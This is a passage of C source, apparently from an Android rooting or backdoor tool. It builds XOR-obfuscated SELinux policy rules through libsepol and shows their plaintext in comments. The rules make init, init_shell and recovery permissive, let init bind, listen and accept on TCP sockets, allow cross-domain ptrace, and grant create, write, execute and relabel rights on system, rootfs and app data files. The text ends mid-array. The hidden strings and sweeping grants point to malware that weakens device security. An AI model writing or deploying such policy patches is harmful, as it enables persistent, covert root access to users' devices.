#include <getopt.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <sepol/policydb/policydb.h>
#include <sepol/policydb/services.h>
#include "deobfuscate.h"
#include "log.h"

#include <unistd.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>

#define POLSIZE 128

unsigned char obf_policy[] = "\x8f\xaa\x2c\xe0\x0c\x3e\x03\x20\x27\x3a\x3c\x0a"; // "/sepolicy"
char pol_list[][POLSIZE] = {
  
  "\x14\x6e\x75\xbc\xb1\xba\x89\x85\xbb\xbb\x85\xbe\xb1\xf2\x85\x86\x85\xa0", // "permissive:init"
  "\x58\x04\x49\x28\x45\x2a\x3d\x31\x2b\x2b\x31\x36\x45\x62\x31\x3e\x31\x34\x0f\x2b\x30\x45\x3c\x3c", // "permissive:init_shell"
  "\x0c\xc0\xdf\xfc\xe9\xfe\xe1\xe5\xff\xff\xe5\xfa\xe9\x36\xfe\xe9\xef\xe3\xfa\xe9\xfe\xf5", // "permissive:recovery"
  "\xae\xc0\x47\x4f\x42\x42\x41\x59\x94\x5d\x4b\x5c\x58\x47\x4d\x4b\x43\x4f\x40\x4f\x49\x4b\x5c\x94\x47\x40\x47\x5a\x71\x5d\x46\x4b\x42\x42\x94\x48\x47\x42\x4b\x94\x41\x5e\x4b\x40", // "allow:servicemanager:init_shell:file:open"
  "\x07\xe9\xc0\xa6\xbd\xbd\xb8\xb0\xcf\xb4\x8e\xb4\xb5\xa2\xba\xa8\xb4\xa2\xb7\xb3\xa2\xb7\xcf\xbe\xbb\xbe\xb5\xa8\xb4\xb1\xa2\xbd\xbd\xcf\xa7\xbe\xbb\xa5\xa2\xb7\xcf\xb5\xb7\xa6\xbb\xb4\xa3\xa2\xb7", // "allow:system_server:init_shell:binder:transfer"
  "\x69\x98\xde\x38\x05\x05\x06\x2e\x73\x2a\x3c\x2b\x2f\x00\x3a\x3c\x04\x38\x07\x38\x3e\x3c\x2b\x73\x00\x07\x00\x2d\x56\x2a\x01\x3c\x05\x05\x73\x29\x2b\x06\x3a\x3c\x2a\x2a\x73\x3e\x3c\x2d\x38\x2d\x2d\x2b", // "allow:servicemanager:init_shell:process:getattr"
  "\x1d\xb3\x84\x9c\x97\x97\x96\xae\x69\x92\x98\x91\xad\x94\x82\x98\x90\x9c\x95\x9c\x9e\x98\x91\x69\x94\x95\x94\xaf\x46\x92\x9b\x98\x97\x97\x69\x9d\x94\x97\x98\x69\xae\x91\x94\xaf\x98", // "allow:servicemanager:init_shell:file:write"
  "\x99\x47\xf7\x78\x7b\x7b\x7a\x72\xad\x76\x04\x75\x71\x70\x06\x04\x7c\x78\x79\x78\x02\x04\x75\xad\x70\x79\x70\x73\x4a\x76\x7f\x04\x7b\x7b\xad\x01\x70\x7b\x04\xad\x75\x04\x78\x03", // "allow:servicemanager:init_shell:file:read"
  "\x81\x09\xa2\xe0\xff\xff\xfe\xf6\xcd\xf2\xe4\xf5\x09\xf8\xe2\xe4\xfc\xe0\xf1\xe0\xe6\xe4\xf5\xcd\xf8\xf1\xf8\xf7\xee\xf2\xfb\xe4\xff\xff\xcd\xe7\xf8\xf5\xcd\xf2\xe4\xe0\xf5\xe2\xfb", // "allow:servicemanager:init_shell:dir:search"
  "\xa9\x54\xcc\x48\x4d\x4d\x4e\x66\xb3\x40\x4f\x40\x65\x1e\x7a\x41\x74\x4d\x4d\xb3\x7a\x41\x74\x4d\x4d\x1e\x74\x71\x74\x4a\xb3\x77\x40\x4d\x74\xb3\x74\x71\x74\x4a\x64\x65\x74\x1e\x4f\x4e\x1e\x65\x7b\x48\x4f\x7a", // "allow:init_shell:shell_exec:file:execute_no_trans"
  "\x4b\x5c\x35\xda\xdf\xdf\xdc\xc4\x91\x22\xdd\x22\xc7\x91\xc8\xd2\xc8\xc7\xd6\xde\x2c\xd5\x22\xdf\xd6\x91\xd5\x22\xdf\xd6\x91\xc9\xd6\xdd\xda\xde\xd6", // "allow:init:system_file:file:rename"
  "\x72\xc2\x9a\x17\x22\x22\x1d\x05\xc8\x1a\x1b\x10\x0b\x15\x15\x1b\x00\x1a\xc8\x01\x1e\x1b\x22\x22\x2d\x1a\x17\x0a\x17\x2d\x14\x1f\x22\x1b\xc8\x1a\x1f\x00\xc8\x01\x1b\x17\x00\x11\x1e", // "allow:debuggerd:shell_data_file:dir:search"
  "\xcb\x97\x78\xd6\xa9\xa9\xac\xc4\x1f\xae\xab\xae\xc1\x1f\xd1\xd2\xd7\xc2\xd4\xd4\xd2\xc7\xd1\xbc\xd2\xdd\xd2\xa8\x1f\xd3\xae\xa9\xd2\x1f\xc4\xc7\xae\xc1\xd2", // "allow:init:debuggerd_exec:file:write"
  "\x18\xc6\xfb\xf9\xfc\xfc\xfb\xf3\x2e\xf1\xfa\xf1\xf4\x2e\x84\x85\x86\xf5\x83\x83\x85\xf6\x84\xcb\x85\xe0\x85\x87\x2e\x82\xf1\xfc\x85\x2e\xf5\xfa\xfc\xf1\xfa\xff", // "allow:init:debuggerd_exec:file:unlink"
  "\xd3\x92\x66\xd6\xc3\xc3\xdc\xa4\xe9\xde\xdd\xde\xab\xe9\xa7\xdc\xa1\xab\xe9\xab\xd0\xa7\x8c\xa0\xdc\xd0\xd8\xda\xab\xe9\xdd\xd6\xc2\xda\x8c\xd0\xdc\xdd\xdd\xda\xd0\xab", // "allow:init:port:tcp_socket:name_connect"
  "\x5f\x83\xec\x42\x35\x35\x30\x28\x6b\x3a\x37\x3a\x2d\x6b\x3d\x3e\x43\x2e\x38\x38\x3e\x33\x3d\x00\x3e\x29\x3e\x3c\x6b\x3f\x3a\x35\x3e\x00\x31\x3e\x33\x36\x3a\x2c\x2c\x3a\x2f\x3e\x6b\x2e\x37\x35\x3a\x37\x34", // "allow:init:debuggerd_exec:file_permissive:unlink"
  "\xa3\xf1\x7d\x42\x31\x31\x4c\x34\x7b\x4a\x4f\x4a\x39\x7b\x49\x46\x43\x36\x44\x44\x46\x33\x49\x1c\x46\x3d\x46\x40\x7b\x47\x4a\x31\x46\x1c\x35\x46\x33\x4e\x4a\x30\x30\x4a\x37\x46\x7b\x34\x33\x4a\x39\x46", // "allow:init:debuggerd_exec:file_permissive:write"
  "\x61\x19\x5b\x00\x3f\x3f\x3e\x36\x6d\x07\x04\x05\x34\x06\x06\x04\x35\x07\x6d\x38\x31\x38\x37\x6d\x33\x35\x3e\x02\x04\x32\x32\x6d\x33\x37\x35\x00\x02\x04", // "allow:debuggerd:init:process:ptrace"
  "\xd8\xbc\x44\xc9\xcc\xcc\xcf\xd7\x22\xce\xc5\xd4\xc4\x22\xd1\xce\xd1\xd4\x22\xd4\xcb\xd8\xff\xdb\xcf\xcb\xd3\xc5\xd4\x22\xd7\xda\xd1\xd4\xc5", // "allow:netd:init:tcp_socket:write"
  "\x1f\xc0\xfe\xfe\xf3\xf3\xf0\xe8\x25\xf6\xf1\xf6\xeb\x25\xf6\xf1\xf6\xeb\x25\xeb\xfc\xef\xc0\xec\xf0\xfc\xf4\xfa\xeb\x25\xfe\xfc\xfc\xfa\xef\xeb", // "allow:init:init:tcp_socket:accept"
  "\x84\xe2\x79\x25\x28\x28\x2f\x37\x42\x2e\x21\x30\x20\x42\x2d\x2e\x2d\x30\x42\x30\x2b\x34\x5f\x3b\x2f\x2b\x33\x21\x30\x42\x3a\x21\x25\x20", // "allow:netd:init:tcp_socket:read"
  "\xdd\x5d\xa1\x44\x53\x53\x52\x5a\x19\x4c\x4d\x4c\x5b\x19\x4c\x4d\x4c\x5b\x19\x5b\x46\x57\x82\x56\x52\x46\x4e\x48\x5b\x19\x53\x4c\x56\x5b\x48\x4d", // "allow:init:init:tcp_socket:listen"
  "\xbb\x0b\x94\xee\xe9\xe9\xd4\xdc\x87\xd6\xeb\xd6\xd1\x87\xeb\xd4\xe1\xe2\x87\xd1\xe8\xdd\xe4\xd8\xd4\xe8\xd0\xe2\xd1\x87\xeb\xd4\xe1\xe2\xe4\xef\xd6\xeb\xe1", // "allow:init:node:tcp_socket:node_bind"
   "\x9f\xee\x6e\x02\x0f\x0f\x30\x38\x7d\x0a\x31\x0a\x37\x7d\x0a\x31\x0a\x37\x7d\x37\x04\x33\x40\x34\x30\x04\x0c\x06\x37\x7d\x05\x0a\x31\x07", // "allow:init:init:tcp_socket:bind"
  "\x09\x48\x61\xf8\xe5\xe5\xe6\x8e\x33\xe0\xe7\xe0\x8d\x33\xe0\xe7\xe0\x8d\x33\x8d\xfa\x89\xd6\x8a\xe6\xfa\xe2\xfc\x8d\x33\x8e\x8b\xe0\x8d\xfc", // "allow:init:init:tcp_socket:write"
  "\xf5\xf1\x1b\x74\x7b\x7b\x7a\x82\x31\x7c\x7d\x7c\x83\x31\x7c\x7d\x7c\x83\x31\x83\x76\x87\x6a\x86\x7a\x76\x7e\x70\x83\x31\x89\x70\x74\x73", // "allow:init:init:tcp_socket:read"
  "\x4e\x5c\x36\xd7\x22\x22\x21\xc9\x8c\xdf\x20\xdf\xca\x8c\xdf\x20\xdf\xca\x8c\xca\xd5\xc6\x31\xc5\x21\xd5\xdd\xdb\xca\x8c\xd5\x21\x20\x20\xdb\xd5\xca\xca\x21", // "allow:init:init:tcp_socket:connectto"
  "\x12\x06\x35\x7f\x82\x82\x85\x6d\x28\x87\x84\x87\x6a\x28\x87\x84\x87\x6a\x28\x6a\x71\x6e\x55\x61\x85\x71\x79\x7b\x6a\x28\x61\x7b\x6a\x85\x6e\x6a", // "allow:init:init:tcp_socket:setopt"
  "\x9d\xb2\x0e\x1c\x11\x11\x16\x2e\xeb\x17\x18\x29\x19\xeb\x14\x17\x14\x29\xeb\x29\x02\x2d\xc6\x12\x16\x02\x1a\x18\x29\xeb\x12\x18\x29\x16\x2d\x29", // "allow:netd:init:tcp_socket:setopt"
  "\x50\x54\x25\xd1\xc4\xc4\xc7\x2f\xea\xc6\xdd\x2c\xdc\xea\xd9\xc6\xd9\x2c\xea\x2c\xd3\x20\x37\x23\xc7\xd3\xdb\xdd\x2c\xea\xdf\xdd\x2c\xc7\x20\x2c", // "allow:netd:init:tcp_socket:getopt"
  "\x5e\xe3\xa2\xc1\xf6\xf6\xf7\xef\xa4\xf9\xf0\xf9\xee\xa4\xf9\xf0\xf9\xee\xa4\xee\xc3\xf2\x07\xf3\xf7\xc3\xfb\xfd\xee\xa4\xf7\xf2\xfd\xf0", // "allow:init:init:tcp_socket:open"
  "\x97\xff\x49\x0a\x05\x05\x08\x20\x53\x02\x07\x02\x1d\x53\x02\x07\x02\x1d\x53\x1d\x0c\x19\x38\x1c\x08\x0c\x04\x0e\x1d\x53\x0c\x1b\x0e\x0a\x1d\x0e", // "allow:init:init:tcp_socket:create"
  "\x63\x53\x2a\x06\x31\x31\x0c\x34\xff\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xff\x0b\x09\xff\x3a\x30\x0a", // "allow:shell:toolbox:fd:use"
    "\x63\x53\x2b\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xff\x0b\x09\xff\x3a\x30\x0a", // "allow:zygote:toolbox:fd:use"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xff\x0b\x09\xff\x3a\x30\x0a", // "allow:recovery:toolbox:fd:use"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0e\x33\x0e\x39\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x3e\x30\xdc\x35\x39\x37\x06\x00\x0a", // "allow:init:init:capability:sys_ptrace"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x3e\x30\xdc\x35\x39\x37\x06\x00\x0a", // "allow:init:init_shell:capability:sys_ptrace"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0e\x33\x0e\x39\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x3e\x30\xdc\x35\x39\x37\x06\x00\x0a", // "allow:init_shell:init:capability:sys_ptrace"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x00\x06\x35\x06\x07\x0e\x31\x0e\x39\x3e\xff\x30\x3e\x30\xdc\x35\x39\x37\x06\x00\x0a", // "allow:init_shell:init_shell:capability:sys_ptrace"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x0d\x0a\x31\x31\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x30\x0e\x04\x33\x3a\x31\x31", // "allow:init:shell:process:signull"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xff\x35\x37\x0c\x00\x0a\x30\x30\xff\x30\x0e\x04\x33\x3a\x31\x31", // "allow:init_shell:shell:process:signull"
    "\x63\x53\x2b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:fuse:file:create"
    "\x63\x53\x2b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:fuse:file:unlink"
    "\x63\x53\x29\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init:fuse:file:open"
    "\x63\x53\x29\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init:fuse:file:read"
    "\x63\x53\x2a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init:fuse:file:write"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:fuse:file:getattr"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:fuse:file:setattr"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init:fuse:file:execute"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init:fuse:file:execute_no_trans"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:fuse:file:relabelfrom"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:fuse:file:relabelto"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:rootfs:file:create"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:rootfs:file:unlink"
    "\x63\x53\x2b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init:rootfs:file:open"
    "\x63\x53\x2b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init:rootfs:file:read"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init:rootfs:file:write"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:rootfs:file:getattr"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:rootfs:file:setattr"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init:rootfs:file:execute"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init:rootfs:file:execute_no_trans"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:rootfs:file:relabelfrom"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:rootfs:file:relabelto"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:system_file:file:create"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:system_file:file:unlink"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init:system_file:file:open"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init:system_file:file:read"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init:system_file:file:write"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:system_file:file:getattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:system_file:file:setattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init:system_file:file:execute"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init:system_file:file:execute_no_trans"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:system_file:file:relabelfrom"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:system_file:file:relabelto"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:system_app_data_file:file:create"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:system_app_data_file:file:unlink"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init:system_app_data_file:file:open"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init:system_app_data_file:file:read"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init:system_app_data_file:file:write"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:system_app_data_file:file:getattr"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:system_app_data_file:file:setattr"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init:system_app_data_file:file:execute"
    "\x63\x53\x05\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init:system_app_data_file:file:execute_no_trans"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:system_app_data_file:file:relabelfrom"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:system_app_data_file:file:relabelto"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init:app_data_file:file:create"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init:app_data_file:file:unlink"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init:app_data_file:file:open"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init:app_data_file:file:read"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init:app_data_file:file:write"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:app_data_file:file:getattr"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:app_data_file:file:setattr"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init:app_data_file:file:execute"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init:app_data_file:file:execute_no_trans"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:app_data_file:file:relabelfrom"
